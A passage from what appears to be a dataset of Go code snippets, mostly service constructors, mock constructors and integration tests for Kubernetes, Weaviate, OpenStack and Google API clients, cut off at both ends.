nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func NewServiceControllerRef(service *v1alpha1.Service) *metav1.OwnerReference {\n\treturn metav1.NewControllerRef(service, serviceControllerKind)\n}", "func New() endly.Service {\n\tvar result = &service{\n\t\tjdkService: &jdkService{},\n\t\tgoService: &goService{},\n\t\tnodeService: &nodeService{},\n\t\tAbstractService: endly.NewAbstractService(ServiceID),\n\t}\n\tresult.AbstractService.Service = result\n\tresult.registerRoutes()\n\treturn result\n}", "func newService(cr *argoprojv1a1.ArgoCD) *corev1.Service {\n\treturn &corev1.Service{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: cr.Name,\n\t\t\tNamespace: cr.Namespace,\n\t\t\tLabels: argoutil.LabelsForCluster(cr),\n\t\t},\n\t}\n}", "func newService() *service {\n\n\tctx, cancel := context.WithCancel(context.Background())\n\n\treturn &service{\n\t\tctx: ctx,\n\t\tctxCancel: cancel,\n\t}\n}", "func TestContainer_Make_With_UnBounded_Reference_It_Should_Fail(t *testing.T) {\n\tinstance.Reset()\n\n\tvar s Shape\n\terr := instance.Make(&s)\n\tassert.EqualError(t, err, \"container: no concrete found for: container_test.Shape\")\n}", "func newNetService() *netService {\n\treturn &netService{\n\t\tagents: make(map[int64]*agent),\n\t\tacceptorUid: 0,\n\t\tacceptors: make(map[int64]*acceptor),\n\t}\n}", "func NewMockCompletableFuture[T interface{}](t interface {\n\tmock.TestingT\n\tCleanup(func())\n}) *MockCompletableFuture[T] {\n\tmock := &MockCompletableFuture[T]{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func newService(kogitoApp *v1alpha1.KogitoApp, deploymentConfig *appsv1.DeploymentConfig) (service *corev1.Service) {\n\tif deploymentConfig == nil {\n\t\t// we can't create a service without a DC\n\t\treturn nil\n\t}\n\n\tports := buildServicePorts(deploymentConfig)\n\tif len(ports) == 0 {\n\t\treturn nil\n\t}\n\n\tservice = &corev1.Service{\n\t\tObjectMeta: *deploymentConfig.ObjectMeta.DeepCopy(),\n\t\tSpec: corev1.ServiceSpec{\n\t\t\tSelector: deploymentConfig.Spec.Selector,\n\t\t\tType: corev1.ServiceTypeClusterIP,\n\t\t\tPorts: ports,\n\t\t},\n\t}\n\n\tmeta.SetGroupVersionKind(&service.TypeMeta, meta.KindService)\n\taddDefaultMeta(&service.ObjectMeta, kogitoApp)\n\taddServiceLabels(&service.ObjectMeta, kogitoApp)\n\timportPrometheusAnnotations(deploymentConfig, service)\n\tservice.ResourceVersion = \"\"\n\treturn service\n}", "func (_m *Client) CreateRef(ctx context.Context, r *goref.Ref) (*elastic.IndexResponse, error) {\n\tret := _m.Called(ctx, r)\n\n\tvar r0 *elastic.IndexResponse\n\tif rf, ok := ret.Get(0).(func(context.Context, *goref.Ref) *elastic.IndexResponse); ok {\n\t\tr0 = rf(ctx, r)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*elastic.IndexResponse)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, *goref.Ref) error); ok {\n\t\tr1 = rf(ctx, r)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func NewOAuth20Service(t mockConstructorTestingTNewOAuth20Service) *OAuth20Service {\n\tmock := &OAuth20Service{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func newService(repo Repository) Service {\n\n\tif repo == nil {\n\t\treturn nil\n\t}\n\treturn &service{repo}\n}", "func New(scope Scope) *Service {\n\tzoneClient := newPrivateZonesClient(scope)\n\tvnetLinkClient := newVirtualNetworkLinksClient(scope)\n\trecordSetsClient := newRecordSetsClient(scope)\n\treturn &Service{\n\t\tScope: scope,\n\t\tzoneGetter: zoneClient,\n\t\tvnetLinkGetter: vnetLinkClient,\n\t\tzoneReconciler: async.New(scope, zoneClient, zoneClient),\n\t\tvnetLinkReconciler: async.New(scope, vnetLinkClient, vnetLinkClient),\n\t\trecordReconciler: async.New(scope, recordSetsClient, recordSetsClient),\n\t}\n}", "func NewMockInterface(t mockConstructorTestingTNewMockInterface) *MockInterface {\n\tmock := &MockInterface{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func TestServiceGetMemoryReference(t *testing.T) {\n\tassert := assert.New(t)\n\tcollection := servicesCollection()\n\n\tvar service Service\n\tservice.Name = kong.String(\"my-service\")\n\tservice.ID = kong.String(\"first\")\n\terr := collection.Add(service)\n\tassert.Nil(err)\n\n\tse, err := collection.Get(\"first\")\n\tassert.Nil(err)\n\tassert.NotNil(se)\n\tse.Host = kong.String(\"example.com\")\n\n\tse, err = collection.Get(\"my-service\")\n\tassert.Nil(err)\n\tassert.NotNil(se)\n\tassert.Nil(se.Host)\n}", "func NewAPIDefinitionConverter(t mockConstructorTestingTNewAPIDefinitionConverter) *APIDefinitionConverter {\n\tmock := &APIDefinitionConverter{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func NewRef(ref FieldRef) Expression {\n\treturn &Parameter{ref: &ref, index: -1}\n}", "func New(ctx context.Context, scope string) (*Service, error) {\n\thttpClient, err := google.DefaultClient(ctx, scope)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &Service{\n\t\tProject: NewProject(httpClient),\n\t}, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Organizations = NewOrganizationsService(s)\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func NewAutomaticScenarioAssignmentService(t mockConstructorTestingTNewAutomaticScenarioAssignmentService) *AutomaticScenarioAssignmentService {\n\tmock := &AutomaticScenarioAssignmentService{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func New(config Config) (*Service, error) {\n\t// Settings.\n\tif config.Flag == nil {\n\t\treturn nil, microerror.Maskf(invalidConfigError, \"config.Flag must not be empty\")\n\t}\n\tif config.Viper == nil {\n\t\treturn nil, microerror.Maskf(invalidConfigError, \"config.Viper must not be empty\")\n\t}\n\n\tvar err error\n\n\tvar k8sClient kubernetes.Interface\n\t{\n\t\tk8sConfig := k8sclient.DefaultConfig()\n\n\t\tk8sConfig.Logger = config.Logger\n\n\t\tk8sConfig.Address = config.Viper.GetString(config.Flag.Service.Kubernetes.Address)\n\t\tk8sConfig.InCluster = config.Viper.GetBool(config.Flag.Service.Kubernetes.InCluster)\n\t\tk8sConfig.TLS.CAFile = config.Viper.GetString(config.Flag.Service.Kubernetes.TLS.CAFile)\n\t\tk8sConfig.TLS.CrtFile = config.Viper.GetString(config.Flag.Service.Kubernetes.TLS.CrtFile)\n\t\tk8sConfig.TLS.KeyFile = config.Viper.GetString(config.Flag.Service.Kubernetes.TLS.KeyFile)\n\n\t\tk8sClient, err = k8sclient.New(k8sConfig)\n\t\tif err != nil {\n\t\t\treturn nil, microerror.Mask(err)\n\t\t}\n\t}\n\n\tvar vaultClient *vaultapi.Client\n\t{\n\t\tvaultConfig := vaultutil.Config{\n\t\t\tFlag: config.Flag,\n\t\t\tViper: config.Viper,\n\t\t}\n\n\t\tvaultClient, err = vaultutil.NewClient(vaultConfig)\n\t\tif err != nil {\n\t\t\treturn nil, microerror.Mask(err)\n\t\t}\n\t}\n\n\tvar crdFramework *framework.Framework\n\t{\n\t\tcrdFramework, err = newCRDFramework(config)\n\t\tif err != nil {\n\t\t\treturn nil, microerror.Mask(err)\n\t\t}\n\t}\n\n\tvar customObjectFramework *framework.Framework\n\t{\n\t\tcustomObjectFramework, err = newCustomObjectFramework(config)\n\t\tif err != nil {\n\t\t\treturn nil, microerror.Mask(err)\n\t\t}\n\t}\n\n\tvar healthzService *healthz.Service\n\t{\n\t\thealthzConfig := healthz.DefaultConfig()\n\n\t\thealthzConfig.K8sClient = k8sClient\n\t\thealthzConfig.Logger = config.Logger\n\t\thealthzConfig.VaultClient = vaultClient\n\n\t\thealthzService, err = healthz.New(healthzConfig)\n\t\tif err != nil {\n\t\t\treturn nil, microerror.Mask(err)\n\t\t}\n\t}\n\n\tvar versionService *version.Service\n\t{\n\t\tversionConfig := version.DefaultConfig()\n\n\t\tversionConfig.Description = config.Description\n\t\tversionConfig.GitCommit = config.GitCommit\n\t\tversionConfig.Name = config.Name\n\t\tversionConfig.Source = config.Source\n\t\tversionConfig.VersionBundles = NewVersionBundles()\n\n\t\tversionService, err = version.New(versionConfig)\n\t\tif err != nil {\n\t\t\treturn nil, microerror.Mask(err)\n\t\t}\n\t}\n\n\tnewService := &Service{\n\t\t// Dependencies.\n\t\tCRDFramework: crdFramework,\n\t\tCustomObjectFramework: customObjectFramework,\n\t\tHealthz: healthzService,\n\t\tVersion: versionService,\n\n\t\t// Internals\n\t\tbootOnce: sync.Once{},\n\t}\n\n\treturn newService, nil\n}", "func New(mockenv *common.MockEnvironment, storage storage.Storage) *MockService {\n\ts := &MockService{\n\t\tkube: mockenv.GetKubeClient(),\n\t\tstorage: storage,\n\t\tprojects: mockenv.GetProjects(),\n\t}\n\ts.v1 = &SecretsV1{MockService: s}\n\treturn s\n}", "func NewReference() *Reference {\n\treturn &Reference{}\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\ts.V1alpha1 = NewV1alpha1Service(s)\n\treturn s, nil\n}", "func New(sync *contract.Sync, dao dao.Service, mutex *shared.Mutex, jobService jobs.Service, historyService history.Service) Service {\n\treturn newService(sync, dao, mutex, jobService, historyService)\n}", "func NewProjectService(\n\tctx *core.Context,\n\tcurrentfolder, projectName string,\n) *ProjectService {\n\ts := new(ProjectService)\n\tcli, err := client.NewKeystoneClient()\n\tif err != nil {\n\t\ts.err = err\n\t\treturn s\n\t}\n\n\ts.ctx = ctx\n\ts.ksfile = new(keystonefile.KeystoneFile)\n\ts.cli = cli\n\n\ts.load(currentfolder, projectName)\n\n\treturn s\n}", "func NewDestinationService(t mockConstructorTestingTNewDestinationService) *DestinationService {\n\tmock := &DestinationService{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func NewReference(label, destination, title []byte) Reference {\n\treturn &reference{label, destination, title}\n}", "func NewMockService(transport *http.Transport, aurl string, rurl string, surl string) Service {\n\n\treturn Service{\n\t\tclient: &http.Client{\n\t\t\tTransport: transport,\n\t\t},\n\t\tauthURL: aurl,\n\t\tregistryURL: rurl,\n\t\tserviceURL: surl,\n\t}\n}", "func NewNotificationsService(t mockConstructorTestingTNewNotificationsService) *NotificationsService {\n\tmock := &NotificationsService{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func Test_RapidlyAddingReferences(t *testing.T) {\n\tsourceClass := \"SequenceReferenceTestSource\"\n\ttargetClass := \"SequenceReferenceTestTarget\"\n\n\tsourceID := strfmt.UUID(\"96ce03ca-58ed-48e1-a0f1-51f63fa9aa12\")\n\n\ttargetIDs := []strfmt.UUID{\n\t\t\"ce1a4756-b7ce-44fa-b079-45a7ec400882\",\n\t\t\"e1edb4ff-570c-4f0b-a1a1-18af118369aa\",\n\t\t\"25d22c70-3df0-4e5c-b8c1-a88d4d2771ef\",\n\t\t\"6f2a0708-3e8e-4a68-9763-26c465d8bf83\",\n\t\t\"c4dfae47-ebcf-4808-9122-1c67898ec140\",\n\t\t\"754bd925-1900-4f93-9f5d-27631eb618bb\",\n\t\t\"babba820-e3f5-4e8d-a354-76f2cb13fdba\",\n\t\t\"270942da-1999-40cd-a580-a91aa144b6c0\",\n\t\t\"a7a06618-6d50-4654-be75-2c9f639a6368\",\n\t\t\"47ba1d2b-6b8c-4b3b-92a8-46574a069ae8\",\n\t}\n\n\tt.Run(\"adding the required schema\", func(t *testing.T) {\n\t\tt.Run(\"target class\", func(t *testing.T) {\n\t\t\tparams := clschema.NewSchemaObjectsCreateParams().WithObjectClass(\n\t\t\t\t&models.Class{\n\t\t\t\t\tClass: targetClass,\n\t\t\t\t\tProperties: []*models.Property{\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tDataType: schema.DataTypeText.PropString(),\n\t\t\t\t\t\t\tTokenization: models.PropertyTokenizationWhitespace,\n\t\t\t\t\t\t\tName: \"name\",\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t)\n\t\t\tresp, err := helper.Client(t).Schema.SchemaObjectsCreate(params, nil)\n\t\t\thelper.AssertRequestOk(t, resp, err, nil)\n\t\t})\n\n\t\tt.Run(\"source class\", func(t *testing.T) {\n\t\t\tparams := clschema.NewSchemaObjectsCreateParams().WithObjectClass(\n\t\t\t\t&models.Class{\n\t\t\t\t\tClass: sourceClass,\n\t\t\t\t\tProperties: []*models.Property{\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tDataType: []string{targetClass},\n\t\t\t\t\t\t\tName: \"toTarget\",\n\t\t\t\t\t\t},\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tDataType: schema.DataTypeText.PropString(),\n\t\t\t\t\t\t\tTokenization: models.PropertyTokenizationWhitespace,\n\t\t\t\t\t\t\tName: \"name\",\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t)\n\t\t\tresp, err := helper.Client(t).Schema.SchemaObjectsCreate(params, nil)\n\t\t\thelper.AssertRequestOk(t, resp, err, nil)\n\t\t})\n\t})\n\n\tt.Run(\"adding all objects (without referencing)\", func(t *testing.T) {\n\t\tt.Run(\"source object\", func(t *testing.T) {\n\t\t\tassertCreateObjectWithID(t, sourceClass, sourceID, map[string]interface{}{\n\t\t\t\t\"name\": \"Source Object\",\n\t\t\t})\n\t\t})\n\n\t\tt.Run(\"target objects\", func(t *testing.T) {\n\t\t\tfor i, id := range targetIDs {\n\t\t\t\tassertCreateObjectWithID(t, targetClass, id, map[string]interface{}{\n\t\t\t\t\t\"name\": fmt.Sprintf(\"target object %d\", i),\n\t\t\t\t})\n\t\t\t}\n\t\t})\n\t})\n\n\tt.Run(\"waiting for the last added object to be present\", func(t *testing.T) {\n\t\tassertGetObjectEventually(t, targetIDs[len(targetIDs)-1])\n\t})\n\n\tt.Run(\"placing all references in succession\", func(t *testing.T) {\n\t\tfor _, id := range targetIDs {\n\t\t\tparams := objects.NewObjectsReferencesCreateParams().\n\t\t\t\tWithID(sourceID).\n\t\t\t\tWithPropertyName(\"toTarget\").\n\t\t\t\tWithBody(\n\t\t\t\t\t&models.SingleRef{\n\t\t\t\t\t\tBeacon: strfmt.URI(fmt.Sprintf(\"weaviate://localhost/%s\", id)),\n\t\t\t\t\t},\n\t\t\t\t)\n\n\t\t\tres, err := helper.Client(t).Objects.ObjectsReferencesCreate(params, nil)\n\t\t\thelper.AssertRequestOk(t, res, err, nil)\n\t\t}\n\t})\n\n\t// wait for index refresh\n\ttime.Sleep(2 * time.Second) // TODO: improve through polling\n\n\tt.Run(\"checking which refs were set\", func(t *testing.T) {\n\t\tsource := assertGetObject(t, sourceID)\n\n\t\tvar foundIDs []strfmt.UUID\n\t\t// extract IDs\n\t\tfor _, ref := range source.Properties.(map[string]interface{})[\"toTarget\"].([]interface{}) {\n\t\t\tbeacon := ref.(map[string]interface{})[\"beacon\"].(string)\n\t\t\tchunks := strings.Split(beacon, \"/\")\n\t\t\tfoundIDs = append(foundIDs, strfmt.UUID(chunks[len(chunks)-1]))\n\t\t}\n\n\t\tassert.ElementsMatch(t, targetIDs, foundIDs)\n\t})\n\n\t// cleanup\n\thelper.Client(t).Schema.SchemaObjectsDelete(\n\t\tclschema.NewSchemaObjectsDeleteParams().WithClassName(sourceClass), nil)\n\thelper.Client(t).Schema.SchemaObjectsDelete(\n\t\tclschema.NewSchemaObjectsDeleteParams().WithClassName(targetClass), nil)\n}", "func newPRMExactReference(dockerReference string) (*prmExactReference, error) {\n\tref, err := reference.ParseNormalizedNamed(dockerReference)\n\tif err != nil {\n\t\treturn nil, InvalidPolicyFormatError(fmt.Sprintf(\"Invalid format of dockerReference %s: %s\", dockerReference, err.Error()))\n\t}\n\tif reference.IsNameOnly(ref) {\n\t\treturn nil, InvalidPolicyFormatError(fmt.Sprintf(\"dockerReference %s contains neither a tag nor digest\", dockerReference))\n\t}\n\treturn &prmExactReference{\n\t\tprmCommon: prmCommon{Type: prmTypeExactReference},\n\t\tDockerReference: dockerReference,\n\t}, nil\n}", "func newService(namespace, name string) *v1.Service {\n\treturn &v1.Service{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: name,\n\t\t\tNamespace: namespace,\n\t\t\tLabels: labelMap(),\n\t\t},\n\t\tSpec: v1.ServiceSpec{\n\t\t\tSelector: labelMap(),\n\t\t\tPorts: []v1.ServicePort{\n\t\t\t\t{Name: \"port-1338\", Port: 1338, Protocol: \"TCP\", TargetPort: intstr.FromInt(1338)},\n\t\t\t\t{Name: \"port-1337\", Port: 1337, Protocol: \"TCP\", TargetPort: intstr.FromInt(1337)},\n\t\t\t},\n\t\t},\n\t}\n\n}", "func (_m *ConstraintReferenceService) Delete(ctx context.Context, constraintID string, formationTemplateID string) error {\n\tret := _m.Called(ctx, constraintID, formationTemplateID)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string, string) error); ok {\n\t\tr0 = rf(ctx, constraintID, formationTemplateID)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func New() (*mock, error) {\n\treturn &mock{\n\t\tConfigService: ConfigService{},\n\t\tContainerService: ContainerService{},\n\t\tDistributionService: DistributionService{},\n\t\tImageService: ImageService{},\n\t\tNetworkService: NetworkService{},\n\t\tNodeService: NodeService{},\n\t\tPluginService: PluginService{},\n\t\tSecretService: SecretService{},\n\t\tServiceService: ServiceService{},\n\t\tSystemService: SystemService{},\n\t\tSwarmService: SwarmService{},\n\t\tVolumeService: VolumeService{},\n\t\tVersion: Version,\n\t}, nil\n}", "func createProviderRef(env *Environment, location DescriptorLocation, yamlRef yamlProviderRef) (ProviderRef, error) {\n\treturn ProviderRef{\n\t\tenv: env,\n\t\tref: yamlRef.Name,\n\t\tparameters: CreateParameters(yamlRef.Params),\n\t\tproxy: createProxy(yamlRef.Proxy),\n\t\tenvVars: createEnvVars(yamlRef.Env),\n\t\tlocation: location,\n\t\tmandatory: true,\n\t}, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Companies = NewCompaniesService(s)\n\ts.Jobs = NewJobsService(s)\n\ts.V2 = NewV2Service(s)\n\treturn s, nil\n}", "func New(scope InboundNatScope) *Service {\n\tclient := newClient(scope)\n\treturn &Service{\n\t\tScope: scope,\n\t\tclient: client,\n\t\tReconciler: async.New(scope, client, client),\n\t}\n}", "func NewAllocationChange(t mockConstructorTestingTNewAllocationChange) *AllocationChange {\n\tmock := &AllocationChange{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.IamPolicies = NewIamPoliciesService(s)\n\ts.Organizations = NewOrganizationsService(s)\n\ts.Permissions = NewPermissionsService(s)\n\ts.Projects = NewProjectsService(s)\n\ts.Roles = NewRolesService(s)\n\treturn s, nil\n}", "func New(opts Opts) (Service, error) {\n\tif err := defaultClientOptions(&opts); err != nil {\n\t\treturn nil, errcode.TODO.Wrap(err)\n\t}\n\n\todb, err := newBertyOrbitDB(opts.RootContext, opts.IpfsCoreAPI, opts.DeviceKeystore, opts.MessageKeystore, opts.Logger, &orbitdb.NewOrbitDBOptions{\n\t\tCache: opts.OrbitCache,\n\t})\n\tif err != nil {\n\t\treturn nil, errcode.TODO.Wrap(err)\n\t}\n\n\tacc, err := odb.OpenAccountGroup(opts.RootContext, nil)\n\tif err != nil {\n\t\treturn nil, errcode.TODO.Wrap(err)\n\t}\n\n\treturn &service{\n\t\tctx: opts.RootContext,\n\t\tipfsCoreAPI: opts.IpfsCoreAPI,\n\t\tlogger: opts.Logger,\n\t\todb: odb,\n\t\tdeviceKeystore: opts.DeviceKeystore,\n\t\tcreatedIPFSNode: opts.createdIPFSNode,\n\t\taccountGroup: acc,\n\t\tgroups: map[string]*bertytypes.Group{\n\t\t\tstring(acc.Group().PublicKey): acc.Group(),\n\t\t},\n\t\topenedGroups: map[string]*groupContext{\n\t\t\tstring(acc.Group().PublicKey): acc,\n\t\t},\n\t}, nil\n}", "func New(name string, options NewOptions) {\n\t// get dir for the service\n\tdir, err := GoServicePath(name)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tSimpleExec(\"git\", \"init\", dir)\n\tSimpleExecInPath(dir, \"git\", \"remote\", \"add\", \"origin\", fmt.Sprintf(GitLabTemplate, name))\n\tlog.Printf(\"Remember to create the %s repository in gitlab: https://your_gitlab_url_goes_here/projects/new\\n\", name)\n\n\t// add REST API if there was a source specified\n\tif options.RestSource != \"\" {\n\t\trestDir := filepath.Join(dir, \"internal\", \"http\", \"rest\")\n\t\terr := os.MkdirAll(restDir, 0770) // nolint: gosec\n\t\tif err != nil {\n\t\t\tlog.Fatal(fmt.Printf(\"Failed to generate dir for rest api %s: %v\", restDir, err))\n\t\t}\n\n\t\tgenerate.Rest(generate.RestOptions{\n\t\t\tPath: filepath.Join(restDir, \"jsonapi.go\"),\n\t\t\tPkgName: \"rest\",\n\t\t\tSource: options.RestSource,\n\t\t})\n\t}\n\n\tSimpleExecInPath(dir, \"go\", \"mod\", \"init\", GoServicePackagePath(name))\n\n\t// Generate commands, docker- and makefile\n\tcommands := generate.NewCommandOptions(name)\n\tgenerate.Commands(dir, commands)\n\tgenerate.Dockerfile(filepath.Join(dir, \"Dockerfile\"), generate.DockerfileOptions{\n\t\tName: name,\n\t\tCommands: commands,\n\t})\n\tgenerate.Makefile(filepath.Join(dir, \"Makefile\"), generate.MakefileOptions{\n\t\tName: name,\n\t})\n\n\tSimpleExecInPath(dir, \"go\", \"mod\", \"vendor\")\n}", "func NewService(client *gophercloud.ProviderClient, clientOpts *clientconfig.ClientOpts, logger logr.Logger) (*Service, error) {\n\tidentityClient, err := openstack.NewIdentityV3(client, gophercloud.EndpointOpts{\n\t\tRegion: \"\",\n\t})\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to create identity service client: %v\", err)\n\t}\n\n\tcomputeClient, err := openstack.NewComputeV2(client, gophercloud.EndpointOpts{\n\t\tRegion: clientOpts.RegionName,\n\t})\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to create compute service client: %v\", err)\n\t}\n\n\tnetworkingClient, err := openstack.NewNetworkV2(client, gophercloud.EndpointOpts{\n\t\tRegion: clientOpts.RegionName,\n\t})\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to create networking service client: %v\", err)\n\t}\n\n\timagesClient, err := openstack.NewImageServiceV2(client, gophercloud.EndpointOpts{\n\t\tRegion: clientOpts.RegionName,\n\t})\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to create image service client: %v\", err)\n\t}\n\n\tif clientOpts.AuthInfo == nil {\n\t\treturn nil, fmt.Errorf(\"failed to get project id: authInfo must be set\")\n\t}\n\n\tprojectID := clientOpts.AuthInfo.ProjectID\n\tif projectID == \"\" && clientOpts.AuthInfo.ProjectName != \"\" {\n\t\tprojectID, err = provider.GetProjectID(client, clientOpts.AuthInfo.ProjectName)\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"error retrieveing project id: %v\", err)\n\t\t}\n\t}\n\tif projectID == \"\" {\n\t\treturn nil, fmt.Errorf(\"failed to get project id\")\n\t}\n\n\tnetworkingService, err := networking.NewService(client, clientOpts, logger)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to create networking service: %v\", err)\n\t}\n\n\treturn &Service{\n\t\tprovider: client,\n\t\tprojectID: projectID,\n\t\tidentityClient: identityClient,\n\t\tcomputeClient: computeClient,\n\t\tnetworkClient: networkingClient,\n\t\tnetworkingService: networkingService,\n\t\timagesClient: imagesClient,\n\t\tlogger: logger,\n\t}, nil\n}", "func newServiceAccount(cr *storagev1.CSIPowerMaxRevProxy) *v1.ServiceAccount {\n\treturn &v1.ServiceAccount{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: ReverseProxyName,\n\t\t\tNamespace: cr.Namespace,\n\t\t\tOwnerReferences: getOwnerReferences(cr),\n\t\t},\n\t}\n}", "func NewService(\n\tlc fx.Lifecycle,\n\tcfg *config.Config,\n\tcfgManager *config.DynamicConfigManager,\n\tcustomProvider *region.DataProvider,\n\tetcdClient *clientv3.Client,\n\tpdClient *pd.Client,\n\tdb *dbstore.DB,\n\ttidbClient *tidb.Client,\n) *Service {\n\ts := &Service{\n\t\tstatus: utils.NewServiceStatus(),\n\t\tconfig: cfg,\n\t\tcfgManager: cfgManager,\n\t\tcustomProvider: customProvider,\n\t\tetcdClient: etcdClient,\n\t\tpdClient: pdClient,\n\t\tdb: db,\n\t\ttidbClient: tidbClient,\n\t}\n\n\tlc.Append(s.managerHook())\n\n\treturn s\n}", "func New() endly.Service {\n\tvar result = &service{\n\t\tAbstractService: endly.NewAbstractService(ServiceID),\n\t}\n\tresult.AbstractService.Service = result\n\tresult.registerRoutes()\n\treturn result\n}", "func New() endly.Service {\n\tvar result = &service{\n\t\tAbstractService: endly.NewAbstractService(ServiceID),\n\t}\n\tresult.AbstractService.Service = result\n\tresult.registerRoutes()\n\treturn result\n}", "func New() endly.Service {\n\tvar result = &service{\n\t\tAbstractService: endly.NewAbstractService(ServiceID),\n\t}\n\tresult.AbstractService.Service = result\n\tresult.registerRoutes()\n\treturn result\n}", "func (c Controller) AddRef() Controller {\n\treturn Controller(capnp.Client(c).AddRef())\n}", "func NewService(repo v1GithubOrg.Repository, ghRepository v1Repositories.Repository, projectsCLAGroupService projects_cla_groups.Repository) Service {\n\treturn service{\n\t\trepo: repo,\n\t\tghRepository: ghRepository,\n\t\tprojectsCLAGroupService: projectsCLAGroupService,\n\t}\n}", "func benchNewConstraint(c string, b *testing.B) {\n\tfor i := 0; i < b.N; i++ {\n\t\tNewConstraint(c)\n\t}\n}", "func NewMockContract(ctrl *gomock.Controller) *MockContract {\n\tmock := &MockContract{ctrl: ctrl}\n\tmock.recorder = &MockContractMockRecorder{mock}\n\treturn mock\n}", "func (c PGClient) NewService(name string, binsIB int64, host string, port int, typeService string, runSTR string, projects []string, owner string) (err error) {\n\t_, err = c.DB.Query(\"select new_service_function($1,$2,$3,$4,$5,$6,$7,$8)\", name, binsIB, host, port, typeService, runSTR, pg.Array(projects), owner)\n\treturn err\n}", "func newMockSubscriber() mockSubscriber {\n\treturn mockSubscriber{}\n}", "func (p *APIProjectRef) ToService() (interface{}, error) {\n\n\tcommitQueue, err := p.CommitQueue.ToService()\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"can't convert commit queue params\")\n\t}\n\n\ti, err := p.TaskSync.ToService()\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"cannot convert API task sync options to service representation\")\n\t}\n\ttaskSync, ok := i.(model.TaskSyncOptions)\n\tif !ok {\n\t\treturn nil, errors.Errorf(\"expected task sync options but was actually '%T'\", i)\n\t}\n\n\ti, err = p.WorkstationConfig.ToService()\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"cannot convert API workstation config\")\n\t}\n\tworkstationConfig, ok := i.(model.WorkstationConfig)\n\tif !ok {\n\t\treturn nil, errors.Errorf(\"expected workstation config but was actually '%T'\", i)\n\t}\n\n\tprojectRef := model.ProjectRef{\n\t\tOwner: utility.FromStringPtr(p.Owner),\n\t\tRepo: utility.FromStringPtr(p.Repo),\n\t\tBranch: utility.FromStringPtr(p.Branch),\n\t\tEnabled: utility.BoolPtrCopy(p.Enabled),\n\t\tPrivate: utility.BoolPtrCopy(p.Private),\n\t\tRestricted: utility.BoolPtrCopy(p.Restricted),\n\t\tBatchTime: 